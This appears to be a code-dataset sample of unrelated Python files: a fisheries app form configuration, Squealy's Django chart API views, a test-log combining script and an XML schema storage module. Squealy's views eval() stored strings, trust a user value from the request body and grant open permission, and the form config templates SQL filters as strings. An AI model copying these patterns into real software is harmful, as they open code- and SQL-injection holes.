'fldName': ["id", "nome","descricao", "comentario", "activo"],
'headerTitle': ['Cod.', 'Nome', 'Descricao', 'Comentarios', 'Activo'],
'lstToHide':[True, False, True, True, False],
'fldToQuote': [True, True, True, True, False],
'val2Rel': [None, None, None, None, None],
'fldRelTblMain': [None, None, None, None, None],
'sizeCol':[50, 450, 200, 200, 50],
'sizeForm':[937, 617],
}
self.dictTipLocal= {
'fldName': ["id", "id_nivel", "nome", "descricao", "comentario", "activo"],
'headerTitle': ["Cod.", "Nivel", "Nome", "Descricao", "Comentarios", "Activo"],
'lstToHide':[True, False, False, True, True, False],
'fldToQuote': [True, True, True, True, True, False],
'val2Rel': [None, ['id','nome'],None, None, None,None],
'fldRelTblMain': [None, 'ref_nivel', None, None, None, None],
'sizeCol':[100, 250, 250, 120, 120, 50],
'sizeForm':[937, 617],
}
self.dictTables= {
'fldName': ["id", "id_grupo", "nome", "descricao", "comentario", "activo"],
'headerTitle': ['Cod.', "Grupo", 'Nome', 'Descricao', 'Comentarios', 'Activo'],
'lstToHide':[True, False, False, True, True, False],
'fldToQuote': [True, True, True, True, True, False],
'val2Rel': [None, ['id', 'nome'], None, None, None, None],
'fldRelTblMain':[None, 'ref_grupo', None, None, None, None],
'condTbl': 'ref_grupo',
'condCol': ['id','nome'],
'condName': 'activo',
'condVal': True,
'condToQuote': False,
'sizeCol':[80, 200, 400, 140, 140, 50],
'sizeForm':[937, 617],
}
self.dictIntClass= {
'fldName': ["id", "id_especie", "intervalo", "comentario", "activo"],
'headerTitle': [ "Cod.", "Especie", "Intevalo", "Comentarios", "Activo"],
'lstToHide':[True, False, False, True, False],
'fldToQuote': [False, True, True, True,False ],
'val2Rel': [None, ['id','nome'],None, None, None],
'fldRelTblMain': [None, 'ref_especies', None, None, None, None],
'sizeCol':[50, 400, 180, 200, 100],
'sizeForm':[937, 617],
}
self.dictUniPescaTipo= {
'fldName': ["id", "nome", "id_arte", "id_tipbarco", "activo", "descricao"],
'headerTitle': ["Cod.","Nome", "Arte", "Tipo de barco", "Activo", "Descricao"],
'lstToHide':[True, False, False, False, False, True],
'fldToQuote': [True, True, True, True, False, True],
'val2Rel': [None, None,['id','nome'], ['id','nome'],None, None],
'fldRelTblMain': [None, None, 'ref_artes', 'ref_table',None, None],
'sizeCol':[100, 250, 170, 170, 100, 50],
'sizeForm':[937, 617],
}
def setMainDict(self):
'''
Metodo para definir um dicionar principal que ira ajudar no manuzeamento de dados
e que permitira configurar o form a nossa maneira, os pop outs e a vizualizacao de dados
'''
self.dictMain = {
'fldDlgDict' : [self.dictSimpel, self.dictArtes, self.dictDiaSemana, self.dictEspecies,
self.dictGeometric, self.dictSimpel, self.dictTables, self.dictTipLocal,
self.dictPesquerio, self.dictRegistador, self.dictUniPescaTipo, self.dictIntClass],
'formLabelName' : ['Codificadores', 'Artes', 'Dias da Semana', 'Especies', ' Geometric', 'Nivel', 'Codificador ',
'Tipo de Local', 'Pesqueiro', 'Registador', 'Tipo de Unidade Pesca', 'Intervalo de Class'],
'toHideGrupo': [True, True, True, True, True, True, False, True, True, True, True, True],
'dlgToPop': [dlg_simpel, dlg_artes, dlg_diasemana, dlg_especies, dlg_geometric, dlg_simpel, dlg_tabela, dlg_tiplocal,
dlg_pesqueiros, dlg_registadores, dlg_UniPescaTipo, dlg_intClass],
'tblName': ['ref_grupo', 'ref_artes', 'ref_diasemana', 'ref_especies', 'ref_geometric', 'ref_nivel', 'ref_table',
'ref_tiplocal', 'ref_pesqueiro', 'ref_registador', 'ref_unidpescatipo', 'ref_intervalo_class'],
'fldFiltro':["ref_grupo.nome LIKE '%{nome}%'", "ref_artes.nome LIKE '%{nome}%'", "ref_diasemana.nome LIKE '%{nome}%'", "ref_especies.species LIKE '%{nome}%'",
"ref_geometric.nome LIKE '%{nome}%'", "ref_nivel.nome LIKE '%{nome}%'", "id_grupo = '{combox}' and ref_table.nome LIKE '%{nome}%'",
"ref_tiplocal.nome LIKE '%{nome}%'", "ref_pesqueiro.nome LIKE '%{nome}%'", "ref_registador.nome LIKE '%{nome}%'", "ref_unidpescatipo.nome LIKE '%{nome}%'",
"ref_intervalo_class.comentarios = ref_intervalo_class.comentarios"]
}
def setDictSecurity(self):
'''
Definimos os widgets que estarao bloqueados para cada user level
'''
self.dictLocked= {
'0':[self.PBAdicionar, self.PBEditar],
'1':[self.PBAdicionar, self.PBEditar],
'10':None,
'99':None
}
| InUrSys/PescArt2.0 | src/Tabelas/frmMainRef.py | Python | gpl-3.0 | 25,640 |
from django.contrib.auth.models import Permission
from django.db import connections
from django.shortcuts import render
from django.db import transaction
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from rest_framework.decorators import permission_classes, api_view
from rest_framework.permissions import IsAdminUser, BasePermission
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from jinjasql import JinjaSql
from squealy.serializers import ChartSerializer
from .exceptions import RequiredParameterMissingException,\
ChartNotFoundException, MalformedChartDataException, \
TransformationException
from .transformers import *
from .formatters import *
from .parameters import *
from .utils import SquealySettings
from .table import Table
from .models import Chart, Transformation, Validation, Parameter
from .validators import run_validation
jinjasql = JinjaSql()
class ChartViewPermission(BasePermission):
def has_permission(self, request, view):
return True
class ChartView(APIView):
permission_classes = SquealySettings.get_default_permission_classes()
permission_classes.append(ChartViewPermission)
authentication_classes = [SessionAuthentication, BasicAuthentication]
authentication_classes.extend(SquealySettings.get_default_authentication_classes())
def get(self, request, chart_url=None, *args, **kwargs):
"""
This is the API endpoint for executing the query and returning the data for a particular chart
"""
chart_attributes = ['parameters', 'validations', 'transformations']
chart = Chart.objects.filter(url=chart_url).prefetch_related(*chart_attributes).first()
if not chart:
raise ChartNotFoundException('No charts found at this path')
params = request.GET.copy()
user = request.user
data = self._process_chart_query(chart, params, user)
return Response(data)
def post(self, request, chart_url=None, *args, **kwargs):
"""
This is the endpoint for running and testing queries from the authoring interface
"""
try:
params = request.data.get('params', {})
user = request.data.get('user', None)
chart_attributes = ['parameters', 'validations', 'transformations']
chart = Chart.objects.filter(url=chart_url).prefetch_related(*chart_attributes).first()
if not chart:
raise ChartNotFoundException('No charts found at this path')
data = self._process_chart_query(chart, params, user)
return Response(data)
except Exception as e:
return Response({'error': str(e)}, status.HTTP_400_BAD_REQUEST)
def _process_chart_query(self, chart, params, user):
"""
Process and return the result after executing the chart query
"""
# Parse Parameters
parameter_definitions = chart.parameters.all()
if parameter_definitions:
params = self._parse_params(params, parameter_definitions)
# Run Validations
validations = chart.validations.all()
if validations:
self._run_validations(params, user, validations)
# Execute the Query, and return a Table
table = self._execute_query(params, user, chart.query)
# Run Transformations
transformations = chart.transformations.all()
if transformations:
table = self._run_transformations(table, transformations)
# Format the table according to google charts / highcharts etc
data = self._format(table, chart.format)
return data
def _parse_params(self, params, parameter_definitions):
for index, param in enumerate(parameter_definitions):
# Default values
if param.default_value and \
param.default_value!= '' and \
params.get(param.name) in [None, '']:
params[param.name] = param.default_value
# Check for missing required parameters
mandatory = param.mandatory
if mandatory and params.get(param.name) is None:
raise RequiredParameterMissingException("Parameter required: " + param.name)
# Formatting parameters
parameter_type_str = param.data_type
kwargs = param.kwargs
parameter_type = eval(parameter_type_str.title())
if params.get(param.name):
params[param.name] = parameter_type(param.name, **kwargs).to_internal(params[param.name])
return params
def _run_validations(self, params, user, validations):
for validation in validations:
run_validation(params, user, validation.query)
def _execute_query(self, params, user, chart_query):
query, bind_params = jinjasql.prepare_query(chart_query,
{
"params": params,
"user": user
})
conn = connections['query_db']
with conn.cursor() as cursor:
cursor.execute(query, bind_params)
rows = []
cols = [desc[0] for desc in cursor.description]
for db_row in cursor:
row_list = []
for col in db_row:
value = col
if isinstance(value, str):
# If value contains a non english alphabet
value = value.encode('utf-8')
else:
value = value
row_list.append(value)
rows.append(row_list)
return Table(columns=cols, data=rows)
def _format(self, table, format):
if format:
if format in ['table', 'json']:
formatter = SimpleFormatter()
else:
formatter = eval(format)()
return formatter.format(table)
return GoogleChartsFormatter().format(table)
def _run_transformations(self, table, transformations):
try:
if transformations:
for transformation in transformations:
transformer_instance = eval(transformation.get_name_display())()
kwargs = transformation.kwargs
table = transformer_instance.transform(table, **kwargs)
return table
except ValueError as e:
raise TransformationException("Error in transformation - " + e.message)
return table
class ChartsLoaderView(APIView):
permission_classes = SquealySettings.get_default_permission_classes()
authentication_classes = [SessionAuthentication, BasicAuthentication]
authentication_classes.extend(SquealySettings.get_default_authentication_classes())
def get(self, request, *args, **kwargs):
charts = Chart.objects.all()
response = ChartSerializer(charts, many=True).data
return Response(response)
def delete(self, request):
"""
To delete a chart
"""
data = request.data
Chart.objects.filter(id=data['id']).first().delete()
return Response({})
def post(self, request):
"""
To save or update chart objects
"""
try:
data = request.data['chart']
chart_object = Chart(id=data['id'], name=data['name'], url=data['url'], query=data['query'],
type=data['type'], options=data['options'])
chart_object.save()
chart_id = chart_object.id
Chart.objects.all().prefetch_related('transformations', 'parameters', 'validations')
# Parsing transformations
transformation_ids = []
transformation_objects = []
existing_transformations = {transformation.name: transformation.id
for transformation in chart_object.transformations.all()}
with transaction.atomic():
for transformation in data['transformations']:
id = existing_transformations.get(transformation['name'], None)
transformation_object = Transformation(id=id, name=transformation['name'],
kwargs=transformation.get('kwargs', None),
chart=chart_object)
transformation_objects.append(transformation_object)
transformation_object.save()
transformation_ids.append(transformation_object.id)
Transformation.objects.filter(chart=chart_object).exclude(id__in=transformation_ids).all().delete()
# Parsing Parameters
parameter_ids = []
existing_parameters = {param.name: param.id
for param in chart_object.parameters.all()}
with transaction.atomic():
for parameter in data['parameters']:
id = existing_parameters.get(parameter['name'], None)
parameter_object = Parameter(id=id, name=parameter['name'], data_type=parameter['data_type'],
mandatory=parameter['mandatory'],
default_value=parameter['default_value'],
test_value=parameter['test_value'], chart=chart_object,
kwargs=parameter['kwargs'])
parameter_object.save()
parameter_ids.append(parameter_object.id)
Parameter.objects.filter(chart=chart_object).exclude(id__in=parameter_ids).all().delete()
# Parsing validations
validation_ids = []
existing_validations = {validation.name: validation.id
for validation in chart_object.validations.all()}
with transaction.atomic():
for validation in data['validations']:
id = existing_validations.get(validation['name'], None)
validation_object = Validation(id=id, query=validation['query'], name=validation['name'],
chart=chart_object)
validation_object.save()
validation_ids.append(validation_object.id)
Validation.objects.filter(chart=chart_object).exclude(id__in=validation_ids).all().delete()
except KeyError as e:
raise MalformedChartDataException("Key Error - " + str(e.args))
return Response(chart_id, status.HTTP_200_OK)
@api_view(['GET'])
@permission_classes(SquealySettings.get('Authoring_Interface_Permission_Classes', (IsAdminUser, )))
def squealy_interface(request):
"""
Renders the squealy authoring interface template
"""
return render(request, 'index.html')
| devashishsharma2302/testing-heroku-deployment | squealy/views.py | Python | mit | 11,267 |
import commandRunner as cr
import subprocess
import glob, os, platform, shutil, adb
from pathlib import Path
def combine_browsers_logs(udid):
cmd = 'rebot -N Combined --outputdir browserlogs/ '
for idx, device in enumerate(udid):
#Get all the output.xml files for the devices
if platform.system() == "Windows":
cmd += os.getcwd() + "\\browserlogs\\" + device + "\output.xml "
else:
cmd += os.getcwd() + "/browserlogs/" + device + "/output.xml "
cr.run_command(cmd)
pngs = []
#For screenshot images
if platform.system() == "Windows":
for idx, device in enumerate(udid):
pngs += glob.glob(os.getcwd() + "\\browserlogs\\" + device + "\\" + "*.png")
for p in pngs:
shutil.copy(p, p.replace(device + "\\", ""))
#remove those that have been moved/copied
pngs = [p for p in pngs if not p]
else:
for idx, device in enumerate(udid):
pngs += glob.glob(os.getcwd() + "/browserlogs/" + device + "/" + "*.png")
for p in pngs:
shutil.copy(p, p.replace(device + "/", ""))
#remove those that have been moved/copied
pngs = [p for p in pngs if not p]
def combine_logs(udid):
cmd = 'rebot -N Combined --outputdir logs/ '
for idx, device in enumerate(udid):
#Get all the output.xml files for the devices
if platform.system() == "Windows":
cmd += os.getcwd() + "\logs\\" + device + "_" + "*\output.xml "
else:
cmd += os.getcwd() + "/logs/" + device + "_" + "*/output.xml "
cr.run_command(cmd)
pngs = []
#For screenshot images
if platform.system() == "Windows":
pngs = glob.glob(os.getcwd() + "\logs\**\*.png")
for idx, device in enumerate(udid):
for p in pngs:
if Path(p).is_file(): #If image exist
imgname = p[p.rindex('\\')+1:]
k = p.rfind("\logs\\")
path = p[:k]
newPath = path + "\logs\\" + imgname
shutil.move(p,newPath)
else:
pngs = glob.glob(os.getcwd() + "/logs/**/*.png")
for idx, device in enumerate(udid):
for p in pngs:
if Path(p).is_file(): #If image exist
imgname = p[p.rindex('/')+1:]
k = p.rfind("/logs/")
path = p[:k]
newPath = path + "/logs/" + imgname
shutil.move(p,newPath)
def zip_logs():
if platform.system() == "Windows":
cmd = "Compress-Archive logs logs-$(date +%Y-%m-%d-%H%M).zip"
subprocess.call(["powershell.exe", cmd])
elif platform.system() == "Linux" or platform.system() == "Darwin":
cmd = "zip -vr logs-$(date +%Y-%m-%d-%H%M).zip" + " logs/"
cr.run_command(cmd)
def zip_browsers_logs():
if platform.system() == "Windows":
cmd = "Compress-Archive browserlogs browserlogs-$(date +%Y-%m-%d-%H%M).zip"
subprocess.call(["powershell.exe", cmd])
elif platform.system() == "Linux" or platform.system() == "Darwin":
cmd = "zip -vr browserlogs-$(date +%Y-%m-%d-%H%M).zip" + " browserlogs/"
cr.run_command(cmd)
def delete_previous_logs():
cmd = 'rm -rf logs/*'
cr.run_command(cmd)
def delete_previous_logs_browser():
cmd = 'rm -rf browserlogs/*'
cr.run_command(cmd) | younglim/hats-ci | robot_automation/src/logs.py | Python | gpl-3.0 | 3,513 |
# This module contains a class for storing data in an XML tree:
#
# TypedStore: this class combines a XML schema file (XSD-like) with an XML tree in
# which values are stored.
# Value types are obtained from the schema definition. Additionally, the TypedStore
# supports (conditional) hiding of nodes, notifications before/after changing of node
# values and node visiblity, a set of default values, arbitrary data streams that are
# stored aside the XML value tree, encapsulating containers such as ZIP, and many other features.
# Import modules from standard Python library
import re, xml.dom.minidom, os, StringIO, codecs
# Import own custom modules
import util, datatypes, versioning
replaceNever = 0
replaceExistingValues = 1
replaceWithEmpty = 2
replaceRemoveOldChildren = 4
replaceAlways = 7
class ValidationException(Exception):
pass
class Schema(object):
"""Class for managing XML-based schemas, used to define TypedStore objects.
Supports caching of schemas (based on file path), parsing of schemas
(i.e., inserting linked templates, resolving dependencies), and provides
access to the main properties (version and root of the XML tree).
"""
cache = {}
knownpaths = {}
@staticmethod
def create(source,cache=True):
"""Creates a schema from file or DOM tree object. If a file path is
provided, the created schema is cached, and returned on subsequent
request for schemas with the same path.
"""
if cache and isinstance(source,basestring):
path = os.path.abspath(source)
if path in Schema.cache:
#print 'Found schema "%s" in cache.' % path
schema = Schema.cache[path]
else:
schema = Schema(source)
Schema.cache[path] = schema
else:
schema = Schema(source)
return schema
def __init__(self,source,sourceisxml=False):
"""Initializes a new Schema from the specified source.
A source can be a path to an XML file, a string containing XML or a xml.dom.minidom DOM object
If it is a a string containing XML, argument "sourceisxml" must be set to True;
otherwise the source is interpreted as a path to an XML file.
"""
# The template can be specified as a DOM object, or as string (i.e. path to XML file)
path = ''
if isinstance(source,basestring):
# The provided schema source is a string. It can be a path to a file or plain XML.
if not sourceisxml:
# The provided source is a path.
path = os.path.abspath(source)
if not os.path.isfile(path):
raise Exception('XML schema file "%s" does not exist.' % path)
self.dom = xml.dom.minidom.parse(path)
else:
# The provided source is a string containing XML.
self.dom = xml.dom.minidom.parseString(source)
elif isinstance(source,xml.dom.minidom.Document):
# The provided source is a DOM object
self.dom = source
else:
assert False, 'First argument (the schema source) must either be a string or an XML DOM tree. Received argument: %s.' % str(source)
# In addition to "element" nodes, a Schema can contains "link" nodes that either reference an
# "template" node within the same schema, or a the root node of another XML file.
# Below all link nodes are replaced by the their target.
Schema.resolveLinks(self.dom,path)
# For every variable: build a list of variables/folders that depend on its value.
self.buildDependencies()
@staticmethod
def resolveLinkedPath(path,refpath=''):
while True:
match = re.match('\[(\w+)]',path)
if match is None: break
exp = match.group(1)
assert exp in Schema.knownpaths, 'Do not know the location of "%s" in linked path "%s".' % (exp,path)
path = os.path.join(path[:match.start(0)],Schema.knownpaths[exp],path[match.end(0)+1:])
return os.path.abspath(os.path.join(os.path.dirname(refpath),path))
@staticmethod
def resolveLinks(dom,sourcepath):
# Resolve links to external documents
links = dom.getElementsByTagName('link')
templates = dict([(node.getAttribute('id'),node) for node in dom.getElementsByTagName('template')])
for link in links:
assert link.hasAttribute('path') or link.hasAttribute('template'), 'Link node does not have "path" or "template" attribute.'
if link.hasAttribute('path'):
# We need to copy from an external XML document.
linkedpath = Schema.resolveLinkedPath(link.getAttribute('path'),sourcepath)
if not os.path.isfile(linkedpath):
raise Exception('Linked XML schema file "%s" does not exist. Source: %s' % (linkedpath,sourcepath))
link.setAttribute('sourcepath',linkedpath)
childdom = xml.dom.minidom.parse(linkedpath)
Schema.resolveLinks(childdom,linkedpath)
templateroot = childdom.documentElement
if link.hasAttribute('node'):
linkednode = link.getAttribute('node')
templateroot = Schema.getNodeFromPath(linkednode.split('/'),templateroot)
assert templateroot is not None, 'Unable to locate node "%s" in "%s".' % (linkednode,linkedpath)
else:
# We need to copy from an internal template.
templateid = link.getAttribute('template')
assert templateid in templates, 'Cannot find template "%s".' % templateid
templateroot = templates[templateid]
linkparent = link.parentNode
# Copy node
newnode = util.copyNode(templateroot,linkparent,targetdoc=dom,name='element',before=link)
# Copy attributes and children of link node to new node.
for key in link.attributes.keys():
if key not in ('path','template','node'):
newnode.setAttribute(key,link.getAttribute(key))
for ch in link.childNodes:
util.copyNode(ch,newnode,targetdoc=dom)
# Remove link node
linkparent.removeChild(link)
return len(links)>0
def getRoot(self):
"""Returns the root of the schema DOM tree."""
return self.dom.documentElement
def getVersion(self):
"""Returns the schema version string."""
return self.dom.documentElement.getAttribute('version')
# buildDependencies: for every variable node, this creates lists of dependent nodes
# (i.e. folders and variables that have one or more conditions that depend on the
# variable under investigation). Essentially we convert lists of dependencies ('servant'-centric)
# into lists of dependent nodes ('controller'-centric). We need the latter in order to selectively
# re-check conditions (and hide/show corresponding nodes) after the value of
# a dependency ('controller') changes.
def buildDependencies(self,root=None,curpath='',curowner=None):
if root is None: root=self.dom.documentElement
for ch in root.childNodes:
if ch.nodeType==ch.ELEMENT_NODE:
if ch.localName=='element':
childcurpath = curpath+'/'+ch.getAttribute('name')
self.buildDependencies(root=ch,curpath=childcurpath,curowner=ch)
if ch.hasAttribute('unit'):
unit = ch.getAttribute('unit')
if unit and unit[0]=='[' and unit[-1]==']':
unitnode,relcurpath = self.getReversePath(ch,unit[1:-1],absourcepath=childcurpath)
self.registerDependency(unitnode,relcurpath,'unit')
elif ch.localName=='condition':
assert curowner.getAttribute('maxOccurs') in ('','1'), 'Currently conditions on optional nodes are not supported.'
if ch.hasAttribute('source'): continue
if ch.hasAttribute('variable'):
# Get the referenced node, and the relative path from there to here.
depnode,relcurpath = self.getReversePath(curowner,ch.getAttribute('variable'),absourcepath=curpath)
# Register the current node with the referenced node,
# so that a change in the referenced node can trigger
# an update in the visibility of the current node.
self.registerDependency(depnode,relcurpath,'visibility')
self.buildDependencies(root=ch,curpath=curpath,curowner=curowner)
elif ch.localName=='options':
curowner.setAttribute('hasoptions',True)
# getTemplateNode: obtains template node at given path
# (path specification consists of array of node ids)
@staticmethod
def getNodeFromPath(path,root):
"""Obtains DOM node in schema at specified path. If a reference node
is provided, the path is assumed to be relative to the reference node.
If no reference node is provided, the path is assumed absolute, that is,
relative to the schema root element."""
for childname in path:
if childname=='..':
root = root.parentNode
assert root.nodeType!=root.DOCUMENT_NODE,'Cannot go up one level; already at the schema root.'
elif childname!='' and childname!='.':
for root in root.childNodes:
if root.nodeType==root.ELEMENT_NODE and root.localName=='element' and root.getAttribute('name')==childname:
break
else:
return None
return root
# getPathFromNode: obtains path specification for given template node
# (path specification consists of node ids with slash separators)
def getPathFromNode(self,node):
"""Gets the absolute path of the specified node, as an array of path
components. The absolute path is defined as the path relative to the
schema root element.
"""
path = []
while node.parentNode.parentNode is not None:
path.insert(0,node.getAttribute('name'))
node = node.parentNode
return path
def getReversePath(self,sourcenode,targetpath,absourcepath=None):
"""Takes a schema reference node, and the path of another node which
may be relative to the reference node, and returns the referenced target
node plus the (potentially relative) path from the target node to the
source node.
The absolute path to the source node may be provided; this saves
computational effort only.
"""
if absourcepath is None: '/'.join(self.getPathFromNode(sourcenode))
refnode = self.dom.documentElement
if targetpath[0]!='/': refnode = sourcenode.parentNode
splittargetpath = targetpath.split('/')
targetnode = Schema.getNodeFromPath(splittargetpath,refnode)
assert targetnode is not None, 'Cannot locate target node "%s" for node "%s".' % (targetpath,absourcepath)
abstargetpath = self.getPathFromNode(targetnode)
assert len(abstargetpath)!=0, 'Target node "%s" for node "%s" corresponds to the root of the DOM tree. This is not allowed.' % (targetpath,absourcepath)
if '.' in splittargetpath or '..' in splittargetpath:
# Find a relative path from the referenced node to the current node.
abstargetpath.pop() # The reference node will be the parent of the specified node
abscurpath = [n for n in absourcepath.split('/') if n!='']
istart = 0
while istart<len(abstargetpath) and istart<len(abscurpath) and abstargetpath[istart]==abscurpath[istart]: istart+=1
return targetnode,(len(abstargetpath)-istart)*'../'+'/'.join(abscurpath[istart:])
else:
# Use the absolute path of the current node.
return targetnode,absourcepath
def registerDependency(self,node,dependantnodepath,type):
"""For the given template node, registers that another node at the
specified (potentially relative) path depends on it.
"""
#print '%s depends on %s' % (dependantnodepath,node.getAttribute('name'))
deplist = util.findDescendantNode(node,['dependentvariables'],create=True)
depnode = self.dom.createElementNS(deplist.namespaceURI,'dependentvariable')
depnode.setAttribute('path',dependantnodepath)
depnode.setAttribute('type',type)
deplist.appendChild(depnode)
def createDocumentation(self,fout=None,showhidden=False):
# Get maximum depth of the tree
def getmaxdepth(node):
maxdepth = 1
for ch in node.childNodes:
if ch.nodeType==ch.ELEMENT_NODE and ch.localName=='element':
maxdepth = max(maxdepth,1+getmaxdepth(ch))
return maxdepth
maxdepth = getmaxdepth(self.dom.documentElement)
# Function for printing a node and its children
def printnode(fout,node,maxdepth,nextid,depth=0,showhidden=False):
# Print info on the node itself
if showhidden or not node.hasAttribute('hidden'):
fout.write('\t<tr valign="top">')
for i in range(depth): fout.write('<td> </td>')
fout.write('<td colspan="%i">%s</td>' % (maxdepth-depth,node.getAttribute('name')))
if node.hasAttribute('type'):
fout.write('<td>%s</td>' % node.getAttribute('type'))
else:
fout.write('<td> </td>')
if node.hasAttribute('description'):
text = node.getAttribute('description')
elif node.hasAttribute('label'):
text = node.getAttribute('label')
else:
text = ' '
opts = []
for ch in node.childNodes:
if ch.nodeType==ch.ELEMENT_NODE and ch.localName=='options':
for optch in ch.childNodes:
if optch.nodeType==ch.ELEMENT_NODE and optch.localName=='option':
if optch.hasAttribute('description'):
label = optch.getAttribute('description')
elif optch.hasAttribute('label'):
label = optch.getAttribute('label')
else:
label = optch.getAttribute('value')
opts.append((optch.getAttribute('value'),label))
if opts:
text += ', <a href="javascript:showhide(\'table%i\')">supported values</a>\n' % nextid
text += '<table id="table%i" cellspacing="0" style="display:none">\n' % nextid
text += '<tr><th>value</th><th>description</th></tr>\n'
text += ''.join(['<tr><td>%s</td><td>%s</td></tr>\n' % o for o in opts])
text += '</table>\n'
fout.write('<td>%s</td></tr>\n' % text)
nextid += 1
# Print info on the children.
for ch in node.childNodes:
if ch.nodeType==ch.ELEMENT_NODE and ch.localName=='element':
nextid = printnode(fout,ch,maxdepth,nextid,depth=depth+1,showhidden=showhidden)
return nextid
# Print all information.
if fout is None: fout = sys.stdout
fout.write('<table cellspacing="0">\n')
for i in range(maxdepth-1): fout.write('<col width="20">')
fout.write('\t<tr><th colspan="%i">node name</th><th>data type</th><th>description</th></tr>\n' % maxdepth)
printnode(fout,self.dom.documentElement,maxdepth,0,showhidden)
fout.write('</table>\n')
import UserDict
class ShortcutDictionary(UserDict.DictMixin):
@staticmethod
def fromDirectory(path,**kwargs):
cache = ShortcutDictionary()
cache.addDirectory(path,**kwargs)
return cache
def __init__(self):
self.links = {}
def __getitem__(self,item):
return self.links[item]
def __setitem__(self,item,value):
self.links[item] = value
def __delitem__(self,item):
del self.links[item]
def keys(self):
return self.links.keys()
def addDirectory(self,path,extension='.xml'):
for templatename in os.listdir(path):
fullpath = os.path.join(path,templatename)
if os.path.isfile(fullpath):
(basename,ext) = os.path.splitext(templatename)
if ext==extension:
self.links[basename] = fullpath
class TypedStoreInterface(object):
"""This class provides an interface to a TypedStore object. The interface
can be configured at initialization to (1) hide nodes with the "hidden"
property set and (2) to omit nodes with the "grouponly" attribute set, replacing
them instead with the node's children.
"""
def __init__(self,store,showhidden=True,omitgroupers=False,processDefaultChange=0,interfacetype='gui'):
self.showhidden = showhidden
self.omitgroupers = omitgroupers
self.interfacetype = interfacetype
self.blockNotifyOfHiddenNodes = not showhidden
# How to process changes in the default node value
# -1: never report
# 0: report only if no explicit value is set (i.e., the default is used)
# 1: always report
self.processDefaultChange = processDefaultChange
self.eventhandlers = {}
store.connectInterface(self)
def unlink(self):
assert self.eventhandlers is not None, 'unlink called on TypedStoreInterface for the second time.'
self.eventhandlers = None
def isGrouper(self,node):
return self.omitgroupers and ('True' in node.grouponly or self.interfacetype in node.grouponly)
def getChildCount(self,node):
"""Returns the number of children of the specified node."""
assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
childcount = 0
for child in node.children:
if child.visible or self.showhidden:
if self.isGrouper(child):
childcount += self.getChildCount(child)
else:
childcount += 1
return childcount
def getChildren(self,node):
"""Returns a list of children of the specified node."""
assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
res = []
for child in node.children:
if child.visible or self.showhidden:
if self.isGrouper(child):
res += self.getChildren(child)
else:
res.append(child)
return res
def getParent(self,node):
"""Returns the parent of the specified node."""
assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
par = node.parent
while self.isGrouper(par): par = par.parent
return par
def getChildByIndex(self,node,index,returnindex=False):
"""Gets the child of the specified node, at the specified index."""
assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
for child in node.children:
if child.visible or self.showhidden:
if self.isGrouper(child):
index = self.getChildByIndex(child,index,returnindex=True)
if not isinstance(index,int): return index
else:
if index==0: return child
index -= 1
if returnindex:
return index
else:
return None
def getOwnIndex(self,node):
"""Returns the index of the specified node in its list of siblings."""
assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
ind = 0
par = node.parent
if self.isGrouper(par): ind = self.getOwnIndex(par)
for (isib,sib) in enumerate(par.children):
if sib is node or isib==node.futureindex: break
if sib.visible or self.showhidden:
if self.isGrouper(sib):
ind += self.getChildCount(sib)
else:
ind += 1
else:
assert node.futureindex is not None, 'Could not find node "%s" in children of supposed parent, but future index was also not set. Data: %s' % (node,node.valuenode.toxml('utf-8'))
assert node.futureindex==len(par.children), 'Could not find node "%s" in children of supposed parent, but future index (%i) was also not set to tailing position (%i).' % (node,node.futureindex,len(par.children))
return ind
def getDepth(self,node):
"""Gets the maximum depth of the tree of descendants of the specified node."""
assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
childmax = 0
for child in self.getChildren(node):
curchilddepth = self.getDepth(child)
if curchilddepth>childmax: childmax = curchilddepth
return childmax+1
def toHtml(self,node,xmldocument,totaldepth,level=0,hidedefaults=False):
"""Returns a list of HTML "tr" nodes that describe the specified node
and its children."""
assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
res = []
tr = None
if level>=0:
tr = xmldocument.createElement('tr')
for i in range(level):
td = xmldocument.createElement('td')
tr.appendChild(td)
td1 = xmldocument.createElement('td')
templatenode = node.templatenode
td1.appendChild(xmldocument.createTextNode(node.getText(detail=1)))
if level+1<totaldepth:
td1.setAttribute('colspan',unicode(totaldepth-level))
tr.appendChild(td1)
td2 = xmldocument.createElement('td')
if node.canHaveValue():
val = node.getValueAsString(usedefault=True)
else:
val = ' '
td2.appendChild(xmldocument.createTextNode(val))
tr.appendChild(td2)
res.append(tr)
childtrs = []
for child in self.getChildren(node):
childnodes = self.toHtml(child,xmldocument,totaldepth,level+1,hidedefaults=hidedefaults)
childtrs += childnodes
res += childtrs
if tr is not None and hidedefaults:
isdefault = True
if node.canHaveValue() and not node.hasDefaultValue():
isdefault = False
else:
for childtr in childtrs:
if not childtr.hasAttribute('default'):
isdefault = False
break
if isdefault:
tr.setAttribute('style','display:none')
tr.setAttribute('default','')
return res
# ---------------------------------------------------------------------------
# Functions for connecting to events
# ---------------------------------------------------------------------------
def connect(self,eventname,handler):
assert eventname in ('beforeVisibilityChange','afterVisibilityChange','afterStoreChange','beforeChange','afterChange'), 'attempt to register for unknown event "%s".' % eventname
assert eventname not in self.eventhandlers, 'handler for event "%s" exists.' % eventname
self.eventhandlers[eventname] = handler
def addChangeHandler(self,callback):
assert not self.changehandlers, 'change handler exists'
self.changehandlers.append(callback)
# ---------------------------------------------------------------------------
# Functions called by store when events occur
# ---------------------------------------------------------------------------
def beforeVisibilityChange(self,node,shownew,showhide):
assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
#print 'beforeVisibilityChange'
self.upcomingvizchange = node
